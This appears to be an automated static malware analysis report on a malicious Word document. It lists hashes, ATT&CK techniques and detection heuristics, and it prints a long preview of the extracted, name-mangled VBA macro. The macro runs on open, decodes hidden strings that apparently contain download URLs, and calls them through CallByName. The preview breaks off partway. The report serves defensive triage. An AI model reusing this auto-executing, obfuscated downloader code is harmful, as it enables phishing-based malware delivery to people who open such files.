Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 e2ea5af25c4e1942…

Verdict: MALICIOUS

File type: Office (OLE) / .DOC
Size: 274.0 KB
Created: 2023-03-21 21:39:00
Authoring application: Microsoft Office Word
First seen: 2023-03-22
MD5: 113a55bb02adefcc77f9d5569dacf6dc
SHA-1: 60d9d3c06a0dbaf92dcf535556dd0a8fd5ab49d4
SHA-256: e2ea5af25c4e1942320c3893fadfd80955d059cd9fa0e9e8bb4e5b78f2c2576b
Risk Score: 172

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro triggers the execution of a function that uses CallByName to invoke methods on an object, indicating an attempt to run arbitrary code. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firing, which signals auto-execution with code execution tokens. The primary IOC is the extracted VBA macro file itself, which is responsible for the malicious behavior.

Heuristics 8

  • VBA macros detected | Severity: medium | 4 related findings | ID: OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call | Severity: high | ID: OLE_VBA_CREATEOBJ
    Matched line in script: Set Ui = CreateObject(dTtDg)
  • CallByName call | Severity: high | ID: OLE_VBA_CALLBYNAME
    Matched line in script: CallByName Zutu, KnXiJTz, 1, EFPHMX
  • VBA p-code auto-exec with execution tokens | Severity: high | ID: OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro | Severity: low | ID: OLE_VBA_AUTOOPEN
    Matched line in script: Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker | Severity: medium | ID: OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact | Severity: info | ID: EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL | Severity: info | ID: EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 36357 bytes
SHA-256: 416898f790132d385aec1bfc2de25e220cf648e59c82806465e9a52087af1684

Detection
ClamAV: No threats found
Obfuscation or payload: likely
183 of 246 identifiers look randomly generated (e.g. 'tIipnTFvxINQBnyfaDGzmWycbSnqWfEXnvkLtMFn') — consistent with name-mangling obfuscation. Carved artifact contains 9 long base64-like blob(s).

Script preview (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub JjDss(Zutu As Object, EFPHMX As String)
Dim KnXiJTz As String
Dim XHBdxfPM As String
Dim fq(15) As Long
Dim UvU As Long
UvU = 12
XHBdxfPM = "XMtELeFfAPNCJYbFroleFUdleGllYRMIDvSeXaXCrECZ"
fq(0) = 12
fq(1) = 17
fq(2) = 6
fq(3) = 38
fq(4) = 3
fq(5) = 6
fq(6) = 7
fq(7) = 18
fq(8) = 19
fq(9) = 23
fq(10) = 6
fq(11) = 17
fq(12) = 16
fq(13) = 19
fq(14) = 3
KnXiJTz = zjU(XHBdxfPM, fq, UvU)
CallByName Zutu, KnXiJTz, 1, EFPHMX
End Sub
Sub zVo(JH As Object)
Dim VKDSSllC As String
Dim WZOYo As String
Dim KwXFhOGC(4) As Long
Dim jBqsDkwp As Long
jBqsDkwp = 4
WZOYo = "LeMYKZThODjZjdsPpnQ"
KwXFhOGC(0) = 9
KwXFhOGC(1) = 17
KwXFhOGC(2) = 2
KwXFhOGC(3) = 18
VKDSSllC = zjU(WZOYo, KwXFhOGC, jBqsDkwp)
CallByName JH, VKDSSllC, 1
End Sub
Sub AutoOpen()
Dim MIdtfjH As String
Dim Wt As String
Dim zKDHnE As String
Dim iOaIHKgD(57) As Long
Dim MGDPRTic As Long
MGDPRTic = 39
zKDHnE = "hpdeKqARjdvZqBRMpgaiYjojeAImtvit/wNn/VaapKoZJrEWVkLChAvFXlmVhgSJXHxdrWGnhEkgOqamBucOBXBgALfMzcKWiuMaSrI/XlyhbSjzCIuhoWvDEkCSApzEeojfOgbVy.iAjoBNQMchUrE1VBBVzm/GmEhmNWkfO:XKamUtyiMcrzQvp/jwtoysvcVBqvtnzNYwMc"
iOaIHKgD(0) = 1
iOaIHKgD(1) = 29
iOaIHKgD(2) = 29
iOaIHKgD(3) = 2
iOaIHKgD(4) = 170
iOaIHKgD(5) = 33
iOaIHKgD(6) = 33
iOaIHKgD(7) = 29
iOaIHKgD(8) = 4
iOaIHKgD(9) = 83
iOaIHKgD(10) = 1
iOaIHKgD(11) = 36
iOaIHKgD(12) = 20
iOaIHKgD(13) = 18
iOaIHKgD(14) = 82
iOaIHKgD(15) = 20
iOaIHKgD(16) = 29
iOaIHKgD(17) = 19
iOaIHKgD(18) = 46
iOaIHKgD(19) = 4
iOaIHKgD(20) = 138
iOaIHKgD(21) = 83
iOaIHKgD(22) = 23
iOaIHKgD(23) = 28
iOaIHKgD(24) = 33
iOaIHKgD(25) = 91
iOaIHKgD(26) = 23
iOaIHKgD(27) = 46
iOaIHKgD(28) = 82
iOaIHKgD(29) = 28
iOaIHKgD(30) = 33
iOaIHKgD(31) = 11
iOaIHKgD(32) = 9
iOaIHKgD(33) = 7
iOaIHKgD(34) = 50
iOaIHKgD(35) = 152
iOaIHKgD(36) = 52
iOaIHKgD(37) = 57
iOaIHKgD(38) = 33
iOaIHKgD(39) = 150
iOaIHKgD(40) = 203
iOaIHKgD(41) = 11
iOaIHKgD(42) = 70
iOaIHKgD(43) = 170
iOaIHKgD(44) = 156
iOaIHKgD(45) = 160
iOaIHKgD(46) = 4
iOaIHKgD(47) = 91
iOaIHKgD(48) = 30
iOaIHKgD(49) = 23
iOaIHKgD(50) = 85
iOaIHKgD(51) = 206
iOaIHKgD(52) = 101
iOaIHKgD(53) = 136
iOaIHKgD(54) = 72
iOaIHKgD(55) = 68
iOaIHKgD(56) = 93
Wt = zjU(zKDHnE, iOaIHKgD, MGDPRTic)
Dim BfCMB As String
Dim hPd As String
Dim nJIbINV(58) As Long
Dim eJcWDl As Long
eJcWDl = 54
hPd = "efpnpjFxTJMNiTs/tIipnTFvxINQBnyfaDGzmWycbSnqWfEXnvkLtMFnLqIWjYvbVscxRRobnXsyNRFEZcPbSeaDXnmhPojPWLYf8tciDcQDokinuOEhoUmrebeWUbcPRusKLGtMJLOCmogpWBlagMECoBS/amidIKVdshYDioBrjLALUUcFRD-lyUWaamtIXXUgUrvPVainWcQCBIqXJHxbXIkteMwdRkvNmoKyezuxtyysdJjhzaUJsEAzwvsSMsktrVhxTtL/DnIvYHyreFPXWhAR:mnAnAeXzpPaplQChIyqCqnawpcznRSlEcsxrYOEV.GWf/XIlUtluBltJm/BGLiaaDIWYJOMuzFisXPgnweUsxCRlvv"
nJIbINV(0) = 92
nJIbINV(1) = 17
nJIbINV(2) = 17
nJIbINV(3) = 3
nJIbINV(4) = 15
nJIbINV(5) = 285
nJIbINV(6) = 16
nJIbINV(7) = 16
nJIbINV(8) = 15
nJIbINV(9) = 33
nJIbINV(10) = 40
nJIbINV(11) = 92
nJIbINV(12) = 13
nJIbINV(13) = 4
nJIbINV(14) = 13
nJIbINV(15) = 4
nJIbINV(16) = 17
nJIbINV(17) = 1
nJIbINV(18) = 120
nJIbINV(19) = 4
nJIbINV(20) = 33
nJIbINV(21) = 17
nJIbINV(22) = 13
nJIbINV(23) = 71
nJIbINV(24) = 4
nJIbINV(25) = 33
nJIbINV(26) = 147
nJIbINV(27) = 326
nJIbINV(28) = 40
nJIbINV(29) = 71
nJIbINV(30) = 37
nJIbINV(31) = 16
nJIbINV(32) = 223
nJIbINV(33) = 3
nJIbINV(34) = 183
nJIbINV(35) = 33
nJIbINV(36) = 160
nJIbINV(37) = 37
nJIbINV(38) = 13
nJIbINV(39) = 4
nJIbINV(40) = 16
nJIbINV(41) = 18
nJIbINV(42) = 52
nJIbINV(43) = 65
nJIbINV(44) = 34
nJIbINV(45) = 4
nJIbINV(46) = 147
nJIbINV(47) = 37
nJIbINV(48) = 18
nJIbINV(49) = 175
nJIbINV(50) = 9
nJIbINV(51) = 41
nJIbINV(52) = 101
nJIbINV(53) = 16
nJIbINV(54) = 296
nJIbINV(55) = 356
nJIbINV(56) = 202
nJIbINV(57) = 176
BfCMB = zjU(hPd, nJIbINV, eJcWDl)
Dim scG As String
Dim No As String
Dim ZrBBnK(71) As Long
Dim TxQK As Long
TxQK = 37
No = "bXHmUHt7:OKndnuYK.LEP/lHsfqGmTpoHtaVgHMqASESAgEIQaBovpStLXowtOactvHXwPyYyuEtpvAxspLQFfO/sOmSsaRcZIFnjdoFKl/RdCAcLygskYdpleR/VdgeClWehYp/zYuLWOs.xRKAPpj"
ZrBBnK(0) = 133
ZrBBnK(1) = 7
ZrBBnK(2) = 7
ZrBBnK(3) = 31
ZrBBnK(4) = 9
ZrBBnK(5) = 22
ZrBBnK(6) = 22
ZrBBnK(7) = 25
ZrBBnK(8) = 32
ZrBBnK(9) = 4
ZrBBnK(10) = 122
ZrBBnK(11) = 37
ZrBBnK(12) = 13
ZrBBnK(13) = 31
ZrBBnK(14) = 25
ZrBBnK(15) = 23
ZrBBnK(16) = 32
ZrBBnK(17) = 23
ZrBBnK(18) = 18
ZrBBnK(19) = 8
ZrBBnK(20) = 4
ZrBBnK(21) = 18
ZrBBnK(22) = 31
ZrBBnK(23) = 23
ZrBBnK(24) = 22
ZrBBnK(25) = 13
ZrBBnK(26) = 35
ZrBBnK(27) = 7
ZrBBnK(28) = 35
ZrBBnK(29) = 1
ZrBBnK(30) = 35
ZrBBnK(31) = 25
ZrBBnK(32) = 122
ZrBBnK(33) = 22
ZrBBnK(34) = 23
ZrBBnK(35) = 15
ZrBBnK(36) = 22
ZrBBnK(37) = 69
ZrBBnK(38) = 51
ZrBBnK(39) = 38
ZrBBnK(40) = 35
ZrBBnK(41) = 25
ZrBBnK(42) = 120
ZrBBnK(43) = 67
ZrBBnK(44) = 73
ZrBBnK(45) = 52
ZrBBnK(46) = 145
ZrBBnK(47) = 120
ZrBBnK(48) = 59
ZrBBnK(49) = 95
ZrBBnK(50) = 147
ZrBBnK(51) = 0
ZrBBnK(52) = 23
ZrBBnK(53) = 19
ZrBBnK(54) = 76
ZrBBnK(55) = 107
ZrBBnK(56) = 150
ZrBBnK(57) = 36
ZrBBnK(58) = 51
ZrBBnK(59) = 53
ZrBBnK(60) = 110
ZrBBnK(61) = 95
ZrBBnK(62) = 125
ZrBBnK(63) = 145
ZrBBnK(64) = 57
ZrBBnK(65) = 131
ZrBBnK(66) = 106
ZrBBnK(67) = 46
ZrBBnK(68) = 92
ZrBBnK(69) = 26
ZrBBnK(70) = 117
scG = zjU(No, ZrBBnK, TxQK)
Dim jlscQ As String
Dim tn As String
Dim eVCFTs(124) As Long
Dim gXIp As Long
gXIp = 45
tn = "FxzRqlVZjpFDCqatcZFmNrhdyjcQfuLuBRDv/wrdpmpNJ/uSuaFpvPUuH/CKRacpVptPYsJnOPAGelN/vWiLbIzLruVJPqNFlgnCLRDoPypjLChLtwVLLiWekrwbdYQVpqZSbUYsiOPIMZ/VOWSd0uLOymwBVw.gmBWgUrfOUoaXKZYwlaQFUVFddLyYfzUloEmmQzhKIDrjWSJerE-XNFpBwUlcmGyKHncMqadYJWUtYrjDWYFFKLdTDgnKhqxMOyiDcYMITzgLxgjaszuZHOUZARbhEUkiXzLTVcAIgDeeg:fDPlgNOvwiAWbeLXQfJKknzwOWxKyYUJIFeROJrbLfWaFftghQHlkMNT8iupVgGjQTPNqnRFd"
eVCFTs(0) = 23
eVCFTs(1) = 16
eVCFTs(2) = 16
eVCFTs(3) = 10
eVCFTs(4) = 302
eVCFTs(5) = 37
eVCFTs(6) = 37
eVCFTs(7) = 98
eVCFTs(8) = 24
eVCFTs(9) = 17
eVCFTs(10) = 98
eVCFTs(11) = 22
eVCFTs(12) = 104
eVCFTs(13) = 30
eVCFTs(14) = 10
eVCFTs(15) = 159
eVCFTs(16) = 36
eVCFTs(17) = 72
eVCFTs(18) = 37
eVCFTs(19) = 38
eVCFTs(20) = 10
eVCFTs(21) = 211
eVCFTs(22) = 15
eVCFTs(23) = 24
eVCFTs(24) = 20
eVCFTs(25) = 83
eVCFTs(26) = 72
eVCFTs(27) = 37
eVCFTs(28) = 149
eVCFTs(29) = 83
eVCFTs(30) = 10
eVCFTs(31) = 82
eVCFTs(32) = 141
eVCFTs(33) = 28
eVCFTs(34) = 69
eVCFTs(35) = 98
eVCFTs(36) = 98
eVCFTs(37) = 31
eVCFTs(38) = 73
eVCFTs(39) = 12
eVCFTs(40) = 359
eVCFTs(41) = 82
eVCFTs(42) = 15
eVCFTs(43) = 29
eVCFTs(44) = 37
eVCFTs(45) = 20
eVCFTs(46) = 65
eVCFTs(47) = 256
eVCFTs(48) = 77
eVCFTs(49) = 287
eVCFTs(50) = 142
eVCFTs(51) = 159
eVCFTs(52) = 29
eVCFTs(53) = 181
eVCFTs(54) = 171
eVCFTs(55) = 15
eVCFTs(56) = 79
eVCFTs(57) = 299
eVCFTs(58) = 250
eVCFTs(59) = 82
eVCFTs(60) = 151
eVCFTs(61) = 277
eVCFTs(62) = 194
eVCFTs(63) = 270
eVCFTs(64) = 309
eVCFTs(65) = 195
eVCFTs(66) = 239
eVCFTs(67) = 86
eVCFTs(68) = 329
eVCFTs(69) = 49
eVCFTs(70) = 193
eVCFTs(71) = 234
eVCFTs(72) = 337
eVCFTs(73) = 122
eVCFTs(74) = 306
eVCFTs(75) = 230
eVCFTs(76) = 251
eVCFTs(77) = 332
eVCFTs(78) = 3
eVCFTs(79) = 291
eVCFTs(80) = 293
eVCFTs(81) = 317
eVCFTs(82) = 110
eVCFTs(83) = 39
eVCFTs(84) = 74
eVCFTs(85) = 233
eVCFTs(86) = 337
eVCFTs(87) = 37
eVCFTs(88) = 91
eVCFTs(89) = 245
eVCFTs(90) = 205
eVCFTs(91) = 102
eVCFTs(92) = 114
eVCFTs(93) = 195
eVCFTs(94) = 70
eVCFTs(95) = 13
eVCFTs(96) = 310
eVCFTs(97) = 307
eVCFTs(98) = 247
eVCFTs(99) = 185
eVCFTs(100) = 76
eVCFTs(101) = 244
eVCFTs(102) = 229
eVCFTs(103) = 4
eVCFTs(104) = 289
eVCFTs(105) = 270
eVCFTs(106) = 211
eVCFTs(107) = 270
eVCFTs(108) = 181
eVCFTs(109) = 242
eVCFTs(110) = 167
eVCFTs(111) = 206
eVCFTs(112) = 367
eVCFTs(113) = 106
eVCFTs(114) = 96
eVCFTs(115) = 124
eVCFTs(116) = 224
eVCFTs(117) = 56
eVCFTs(118) = 248
eVCFTs(119) = 14
eVCFTs(120) = 16
eVCFTs(121) = 0
eVCFTs(122) = 359
eVCFTs(123) = 144
jlscQ = zjU(tn, eVCFTs, gXIp)
Dim TFMz As String
Dim HMQYOby As String
Dim JrZ(170) As Long
Dim iZiHtoD As Long
iZiHtoD = 57
HMQYOby = "lVuodDGuRTPKFxKHerZgYRrZRY/CS:.aJvkcBEFBkVWPjwGHhayjuPpXuozDtVwtNuy3gtoeVUtbKSPAgbHidTQbVoMpFKxdrQhdNMiDOOqer/jKJQNrp9AdxloHbLXLLfYcXMbBszboWTjslJepIG0AsmutvgetVitnWr-BA6otHwEW/A0LVcLvFq4UBqsgk6mwEynRojeyaYDHlX/WaULMtwhGnpoEjGaNxICxtwwwskXtyygRPOrMtpmn/oryxOplFpLWnlfoGmy.niFevcgxrRzRzvVxAhuZQNaaaiQVlfM"
JrZ(0) = 49
JrZ(1) = 61
JrZ(2) = 61
JrZ(3) = 55
JrZ(4) = 137
JrZ(5) = 30
JrZ(6) = 27
JrZ(7) = 27
JrZ(8) = 137
JrZ(9) = 3
JrZ(10) = 55
JrZ(11) = 55
JrZ(12) = 1
JrZ(13) = 84
JrZ(14) = 17
JrZ(15) = 18
JrZ(16) = 36
JrZ(17) = 84
JrZ(18) = 61
JrZ(19) = 51
JrZ(20) = 31
JrZ(21) = 36
JrZ(22) = 4
JrZ(23) = 154
JrZ(24) = 31
JrZ(25) = 154
JrZ(26) = 14
JrZ(27) = 27
JrZ(28) = 46
JrZ(29) = 55
JrZ(30) = 167
JrZ(31) = 36
JrZ(32) = 4
JrZ(33) = 164
JrZ(34) = 61
JrZ(35) = 17
JrZ(36) = 164
JrZ(37) = 61
JrZ(38) = 27
JrZ(39) = 14
JrZ(40) = 151
JrZ(41) = 3
JrZ(42) = 170
JrZ(43) = 46
JrZ(44) = 29
JrZ(45) = 10
JrZ(46) = 151
JrZ(47) = 68
JrZ(48) = 51
JrZ(49) = 170
JrZ(50) = 56
JrZ(51) = 187
JrZ(52) = 118
JrZ(53) = 91
JrZ(54) = 105
JrZ(55) = 107
JrZ(56) = 27
JrZ(57) = 260
JrZ(58) = 208
JrZ(59) = 144
JrZ(60) = 285
JrZ(61) = 264
JrZ(62) = 300
JrZ(63) = 52
JrZ(64) = 176
JrZ(65) = 101
JrZ(66) = 202
JrZ(67) = 268
JrZ(68) = 189
JrZ(69) = 39
JrZ(70) = 45
JrZ(71) = 208
JrZ(72) = 264
JrZ(73) = 181
JrZ(74) = 136
JrZ(75) = 200
JrZ(76) = 138
JrZ(77) = 117
JrZ(78) = 182
JrZ(79) = 261
JrZ(80) = 184
JrZ(81) = 66
JrZ(82) = 118
JrZ(83) = 138
JrZ(84) = 8
JrZ(85) = 154
JrZ(86) = 53
JrZ(87) = 278
JrZ(88) = 240
JrZ(89) = 292
JrZ(90) = 70
JrZ(91) = 109
JrZ(92) = 274
JrZ(93) = 296
JrZ(94) = 254
JrZ(95) = 296
JrZ(96) = 251
JrZ(97) = 41
JrZ(98) = 233
JrZ(99) = 79
JrZ(100) = 35
JrZ(101) = 178
JrZ(102) = 266
JrZ(103) = 95
JrZ(104) = 198
JrZ(105) = 285
JrZ(106) = 152
JrZ(107) = 56
JrZ(108) = 58
JrZ(109) = 21
JrZ(110) = 296
JrZ(111) = 107
JrZ(112) = 193
JrZ(113) = 259
JrZ(114) = 276
JrZ(115) = 300
JrZ(116) = 2
JrZ(117) = 94
JrZ(118) = 290
JrZ(119) = 103
JrZ(120) = 237
JrZ(121) = 11
JrZ(122) = 175
JrZ(123) = 219
JrZ(124) = 84
JrZ(125) = 273
JrZ(126) = 159
JrZ(127) = 209
JrZ(128) = 142
JrZ(129) = 186
JrZ(130) = 198
JrZ(131) = 257
JrZ(132) = 38
JrZ(133) = 121
JrZ(134) = 220
JrZ(135) = 235
JrZ(136) = 142
JrZ(137) = 84
JrZ(138) = 19
JrZ(139) = 54
JrZ(140) = 112
JrZ(141) = 71
JrZ(142) = 6
JrZ(143) = 266
JrZ(144) = 17
JrZ(145) = 146
JrZ(146) = 162
JrZ(147) = 129
JrZ(148) = 205
JrZ(149) = 186
JrZ(150) = 246
JrZ(151) = 82
JrZ(152) = 156
JrZ(153) = 212
JrZ(154) = 19
JrZ(155) = 299
JrZ(156) = 37
JrZ(157) = 39
JrZ(158) = 238
JrZ(159) = 302
JrZ(160) = 256
JrZ(161) = 16
JrZ(162) = 14
JrZ(163) = 116
JrZ(164) = 91
JrZ(165) = 144
JrZ(166) = 99
JrZ(167) = 90
JrZ(168) = 5
JrZ(169) = 175
TFMz = zjU(HMQYOby, JrZ, iZiHtoD)
Dim eQK As String
Dim LnDipyk As String
Dim Fvb(67) As Long
Dim QzrqJEy As Long
QzrqJEy = 37
LnDipyk = "fxFdLdZYzfwy/NVyce/KCAEAzeEIrzNghmKtoqWJPVaKOMNaoMHxfmST/lRngAzaQik/a.RQAATiidsgWIufKoHppFatPerqOgdOBcofqydyEgSIUR:QiEtBTKl.hplrbYCagDrVhhnAzBhaieavolWRXNzWzQkaqRnNSZzpjnQEadkEcGptqYNKppPCsZpLMZdAMFWEmArfEETzHYmYKyQjUIdVxdCwg/ExOBYhKTqZLhWLSzoptZSPLfxUbrMl"
Fvb(0) = 33
Fvb(1) = 36
Fvb(2) = 36
Fvb(3) = 88
Fvb(4) = 115
Fvb(5) = 13
Fvb(6) = 13
Fvb(7) = 4
Fvb(8) = 43
Fvb(9) = 29
Fvb(10) = 129
Fvb(11) = 43
Fvb(12) = 9
Fvb(13) = 66
Fvb(14) = 70
Fvb(15) = 37
Fvb(16) = 29
Fvb(17) = 32
Fvb(18) = 70
Fvb(19) = 32
Fvb(20) = 18
Fvb(21) = 13
Fvb(22) = 58
Fvb(23) = 43
Fvb(24) = 60
Fvb(25) = 32
Fvb(26) = 83
Fvb(27) = 43
Fvb(28) = 32
Fvb(29) = 18
Fvb(30) = 13
Fvb(31) = 66
Fvb(32) = 12
Fvb(33) = 65
Fvb(34) = 46
Fvb(35) = 33
Fvb(36) = 13
Fvb(37) = 60
Fvb(38) = 46
Fvb(39) = 66
Fvb(40) = 214
Fvb(41) = 10
Fvb(42) = 237
Fvb(43) = 207
Fvb(44) = 197
Fvb(45) = 227
Fvb(46) = 2
Fvb(47) = 103
Fvb(48) = 92
Fvb(49) = 176
Fvb(50) = 72
Fvb(51) = 207
Fvb(52) = 107
Fvb(53) = 64
Fvb(54) = 36
Fvb(55) = 91
Fvb(56) = 126
Fvb(57) = 56
Fvb(58) = 170
Fvb(59) = 149
Fvb(60) = 96
Fvb(61) = 256
Fvb(62) = 190
Fvb(63) = 42
Fvb(64) = 68
Fvb(65) = 103
Fvb(66) = 221
eQK = zjU(LnDipyk, Fvb, QzrqJEy)
Dim nnY As String
Dim Vybd As String
Dim BgWFqxn(48) As Long
Dim ylK As Long
ylK = 40
Vybd = "NtM/lRPQrAn:kRtI/e.ThTMLUwCgA//nNdeuOfXifOrdjliKgXKDKnoVqGFwrzPBmAhmRHkIEilxdOxqZsCDMiYobHmodtSYzZoWqKoesI8qrTIgSvvctrpjFNoaDoJvg/ikJvcfNjzafD"
BgWFqxn(0) = 21
BgWFqxn(1) = 2
BgWFqxn(2) = 2
BgWFqxn(3) = 119
BgWFqxn(4) = 12
BgWFqxn(5) = 4
BgWFqxn(6) = 4
BgWFqxn(7) = 116
BgWFqxn(8) = 55
BgWFqxn(9) = 11
BgWFqxn(10) = 38
BgWFqxn(11) = 18
BgWFqxn(12) = 34
BgWFqxn(13) = 18
BgWFqxn(14) = 9
BgWFqxn(15) = 124
BgWFqxn(16) = 2
BgWFqxn(17) = 40
BgWFqxn(18) = 55
BgWFqxn(19) = 11
BgWFqxn(20) = 116
BgWFqxn(21) = 40
BgWFqxn(22) = 57
BgWFqxn(23) = 19
BgWFqxn(24) = 38
BgWFqxn(25) = 9
BgWFqxn(26) = 4
BgWFqxn(27) = 40
BgWFqxn(28) = 65
BgWFqxn(29) = 124
BgWFqxn(30) = 28
BgWFqxn(31) = 18
BgWFqxn(32) = 82
BgWFqxn(33) = 4
BgWFqxn(34) = 107
BgWFqxn(35) = 6
BgWFqxn(36) = 16
BgWFqxn(37) = 59
BgWFqxn(38) = 9
BgWFqxn(39) = 4
BgWFqxn(40) = 108
BgWFqxn(41) = 83
BgWFqxn(42) = 85
BgWFqxn(43) = 131
BgWFqxn(44) = 43
BgWFqxn(45) = 116
BgWFqxn(46) = 5
BgWFqxn(47) = 76
nnY = zjU(Vybd, BgWFqxn, ylK)
Dim nN As String
Dim dP As String
Dim GlQ(70) As Long
Dim OQoC As Long
OQoC = 47
dP = "cn/eJuqqMwjWExkFuyvkbxFNIhKOFwtozWJkA5XqwKMKJJZRyqoLyqbeZZlop/ukmtbrnYpncnn.woLTGprHnQqmeYeaDipiFuhM/qliotSCDiANIvarqVmFNDecAGibfjAwxZrGoLvDhsGrBLBwCEcquMbWTVCLdHdgxiBQvWVCCzkyhmDlWHBbOZsonaJXnTIAmGdRGFRMxTaTomOodInPOhSslcB:xDoFiyqUGClaPJfcshhunJdzCX/FdvPIeL/nJhGzajpgEOYtepAbAArlYCIeVbWcMlmpqniTZaipjBRKubtdOjgPbsCaUdN-RKN5fCwhiInJybmqdLayd"
GlQ(0) = 26
GlQ(1) = 31
GlQ(2) = 31
GlQ(3) = 61
GlQ(4) = 224
GlQ(5) = 3
GlQ(6) = 3
GlQ(7) = 26
GlQ(8) = 32
GlQ(9) = 1
GlQ(10) = 19
GlQ(11) = 94
GlQ(12) = 4
GlQ(13) = 2
GlQ(14) = 1
GlQ(15) = 26
GlQ(16) = 6
GlQ(17) = 18
GlQ(18) = 4
GlQ(19) = 2
GlQ(20) = 164
GlQ(21) = 94
GlQ(22) = 92
GlQ(23) = 76
GlQ(24) = 19
GlQ(25) = 2
GlQ(26) = 3
GlQ(27) = 10
GlQ(28) = 61
GlQ(29) = 320
GlQ(30) = 92
GlQ(31) = 161
GlQ(32) = 65
GlQ(33) = 94
GlQ(34) = 2
GlQ(35) = 3
GlQ(36) = 38
GlQ(37) = 80
GlQ(38) = 38
GlQ(39) = 5
GlQ(40) = 21
GlQ(41) = 12
GlQ(42) = 92
GlQ(43) = 6
GlQ(44) = 59
GlQ(45) = 28
GlQ(46) = 3
GlQ(47) = 261
GlQ(48) = 121
GlQ(49) = 170
GlQ(50) = 47
GlQ(51) = 203
GlQ(52) = 253
GlQ(53) = 229
GlQ(54) = 288
GlQ(55) = 205
GlQ(56) = 20
GlQ(57) = 251
GlQ(58) = 49
GlQ(59) = 324
GlQ(60) = 304
GlQ(61) = 153
GlQ(62) = 115
GlQ(63) = 15
GlQ(64) = 40
GlQ(65) = 284
GlQ(66) = 239
GlQ(67) = 37
GlQ(68) = 289
GlQ(69) = 290
nN = zjU(dP, GlQ, OQoC)
Dim FTi As String
Dim tYmLHoM As String
Dim YgIqdtYK(80) As Long
Dim rt As Long
rt = 52
tYmLHoM = "zvHpessOeUqIcgvtMBspUNxGHdhhWbEFzbqOtiDbpBLVneSAkaxpJFcuJCuwMc/qagLxu/nnRiTbxoqTdtKpyheoEdMk-nCrecQVWALOvtyndrkulLVJDNYyhmPbbVVztDjxkCvXvhCJMkuBlvAZoiQDSRCfzvOW.hTwNKyTQaKsmEuyWpDTMPzKhDpPiSUsqyFozQTPvnhtnOWFrWaspiSjggaJGgoiDIOhbdvrWXXuMBIzhHDorUwwmBaLr/cxZIqvaGfTF/kttczLTYHOGcOFDdgyJCvzBzogRv/WZOtrtQsONWfEaxSi:oiDx"
YgIqdtYK(0) = 27
YgIqdtYK(1) = 16
YgIqdtYK(2) = 16
YgIqdtYK(3) = 4
YgIqdtYK(4) = 313
YgIqdtYK(5) = 63
YgIqdtYK(6) = 63
YgIqdtYK(7) = 6
YgIqdtYK(8) = 4
YgIqdtYK(9) = 38
YgIqdtYK(10) = 96
YgIqdtYK(11) = 38
YgIqdtYK(12) = 16
YgIqdtYK(13) = 56
YgIqdtYK(14) = 50
YgIqdtYK(15) = 113
YgIqdtYK(16) = 78
YgIqdtYK(17) = 56
YgIqdtYK(18) = 16
YgIqdtYK(19) = 26
YgIqdtYK(20) = 78
YgIqdtYK(21) = 78
YgIqdtYK(22) = 96
YgIqdtYK(23) = 50
YgIqdtYK(24) = 26
YgIqdtYK(25) = 2
YgIqdtYK(26) = 5
YgIqdtYK(27) = 45
YgIqdtYK(28) = 16
YgIqdtYK(29) = 56
YgIqdtYK(30) = 96
YgIqdtYK(31) = 5
YgIqdtYK(32) = 6
YgIqdtYK(33) = 161
YgIqdtYK(34) = 78
YgIqdtYK(35) = 96
YgIqdtYK(36) = 14
YgIqdtYK(37) = 63
YgIqdtYK(38) = 13
YgIqdtYK(39) = 14
YgIqdtYK(40) = 38
YgIqdtYK(41) = 93
YgIqdtYK(42) = 30
YgIqdtYK(43) = 38
YgIqdtYK(44) = 45
YgIqdtYK(45) = 63
YgIqdtYK(46) = 14
YgIqdtYK(47) = 156
YgIqdtYK(48) = 16
YgIqdtYK(49) = 53
YgIqdtYK(50) = 45
YgIqdtYK(51) = 63
YgIqdtYK(52) = 81
YgIqdtYK(53) = 176
YgIqdtYK(54) = 255
YgIqdtYK(55) = 221
YgIqdtYK(56) = 120
YgIqdtYK(57) = 208
YgIqdtYK(58) = 242
YgIqdtYK(59) = 242
YgIqdtYK(60) = 308
YgIqdtYK(61) = 116
YgIqdtYK(62) = 284
YgIqdtYK(63) = 259
YgIqdtYK(64) = 274
YgIqdtYK(65) = 9
YgIqdtYK(66) = 101
YgIqdtYK(67) = 208
YgIqdtYK(68) = 296
YgIqdtYK(69) = 284
YgIqdtYK(70) = 297
YgIqdtYK(71) = 53
YgIqdtYK(72) = 306
YgIqdtYK(73) = 64
YgIqdtYK(74) = 199
YgIqdtYK(75) = 171
YgIqdtYK(76) = 249
YgIqdtYK(77) = 111
YgIqdtYK(78) = 150
YgIqdtYK(79) = 38
